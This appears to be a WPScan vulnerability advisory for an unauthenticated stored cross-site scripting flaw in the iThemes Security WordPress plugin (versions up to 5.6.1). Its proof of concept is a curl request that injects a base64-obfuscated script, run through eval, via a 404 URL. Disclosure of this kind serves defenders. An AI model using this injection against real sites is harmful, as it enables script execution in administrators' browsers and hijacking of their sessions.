iThemes Security <= 5.6.1 - Unauthenticated Stored Cross-Site Scripting (XSS)

Sign up to our free email alerts service for instant vulnerability notifications!

Description
The 404 detection module needs to be enabled.
Proof of Concept
curl “http://ithemesprotected.target/index.php/2016/09/22/trigger-404/?<script>x=String(/YWxlcnQoInRlc3QiKQ==/);x=x.substring(1,x.length-1);eval(atob(x));</script>“ -H ‘Accept-Encoding: gzip, deflate, sdch’ -H ‘Accept-Language: en-US,en;q=0.8’ -H ‘Upgrade-Insecure-Requests: 1’ -H ‘User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36’ -H ‘Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8’ -H ‘Cache-Control: max-age=0’ -H ‘Cookie: wordpress_test_cookie=WP+Cookie+check’ -H ‘Connection: keep-alive’ -H ‘Referer: http://ithemesprotected.target/wp-login.php?da=777&bu=777' — compressed

Affects

Plugin better-wp-security
fixed in version 5.6.2

References

URL https://medium.com/websec/xss-vulnerability-in-ithemes-security-formerly-better-wp-security-5-6-1-2fba71f96f5d#.4ptv9xsb3

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Slavco Mihajloski
Submitter Website https://medium.com/websec
Submitter Twitter https://twitter.com/wpwebsec
Views 419
Verified No
WPVDB ID 8635

Timeline

Publicly Published 2016-10-06 (2 months ago)
Added 2016-10-06 (2 months ago)
Last Updated 2016-10-06 (2 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.